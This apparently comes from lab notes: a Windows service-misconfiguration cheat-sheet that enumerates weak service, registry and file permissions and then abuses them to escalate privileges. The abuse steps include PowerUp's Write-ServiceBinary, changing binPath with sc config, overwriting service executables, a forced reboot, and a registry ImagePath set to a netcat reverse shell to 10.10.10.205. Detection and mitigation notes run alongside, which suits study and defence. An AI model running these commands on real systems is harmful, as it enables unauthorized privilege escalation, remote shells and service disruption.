# Windows service misconfiguration cheat-sheet (lab transcript, mixed PowerShell and cmd.exe).
# Covers enumeration of weak service/registry/file ACLs, then the service-config
# changes those weaknesses allow. Lines starting with "PS C:\htb>" or "C:\htb>"
# are console prompts copied from the lab, not part of the command.

# Audit weak service permissions with SharpUp ("audit" runs all of its checks).
PS C:\htb> .\SharpUp.exe audit
# Search for weak service ACLs in the Windows Registry.
# accesschk flags: -k registry key, -v verbose, -u suppress errors, -q no banner,
# -s recurse, -w list only objects the named account ("mrb3n") can write to.
# Any hit means that account can edit a service's configuration values in place.
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
# Manual checks
# Lists services whose PathName is outside C:\Windows and does not begin with a
# double quote, i.e. candidates for an unquoted service path. A result only
# matters if the path contains a space and a parent directory is writable.
# Get-WmiObject is absent from PowerShell 6+; Get-CimInstance is the replacement.
# Fix: quote the ImagePath and remove non-admin write access on the directories.
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
# Check file or directory permissions (owner and access entries of the install dir).
# Look for Write/Modify/FullControl granted to Users, Authenticated Users or Everyone.
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
# Check service configuration.
# NOTE(review): this returns the service's properties (path, start mode, state,
# logon account), not its security descriptor; the service DACL itself is shown
# by "sc.exe sdshow <ServiceName>" or accesschk.
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
# Abuse
# Write-ServiceBinary is a PowerUp function; here it writes a service binary to
# -Path. -Command is left empty in these notes. It overwrites the file at that
# path, so keep a copy of the original to restore afterwards.
# Detection: file creation or hash change of a service executable (Sysmon Event ID 11, FIM).
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "" | fl
# Interact with the service.
# A changed binary or config only takes effect at the next service start, and
# start/stop needs the matching rights in the service DACL.
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
Restart-Service -Name 'IObitUnSvr'
# cmd.exe equivalents. In Windows PowerShell "sc" is an alias for Set-Content,
# so call "sc.exe" explicitly there.
C:\htb> sc start <ServiceName>
C:\htb> sc stop <ServiceName>
C:\htb> sc query <ServiceName>
# Reboot the machine immediately (-r restart, -t 0 no delay), used when the
# service is auto-start but the account cannot restart it. Needs the shutdown
# privilege, interrupts every user on the host, and is logged as System Event ID 1074.
shutdown -r -t 0
# Modify service binPath (needs SERVICE_CHANGE_CONFIG on the service).
# NOTE(review): Microsoft's sc documentation requires a space after "binpath=";
# confirm the no-space form shown here works on the target Windows version.
# Record the original value first (sc qc <ServiceName>) so it can be restored.
# Mitigation: remove SERVICE_CHANGE_CONFIG / SERVICE_ALL_ACCESS from non-admin principals.
C:\htb> sc config <ServiceName> binpath="COMMAND-HERE"
# Modify ImagePath directly in the registry (works when the service's registry
# key is writable, as found by the accesschk -k check above in this file).
# The address and paths are lab values. Restore the original ImagePath afterwards.
# Detection: registry value set on ...\Services\*\ImagePath (Sysmon Event ID 13,
# Security 4657 if a SACL is configured); a non-service program in ImagePath
# typically also produces Service Control Manager start failures (Event ID 7000/7009).
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# Replacing a service binary (example).
# Works only when the executable or its directory is writable by the current
# account; /Y overwrites without prompting, so back up the original first.
# Mitigation: restrict the install directory to Administrators/SYSTEM/TrustedInstaller
# write access (review with icacls) and monitor service executables for changes.
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"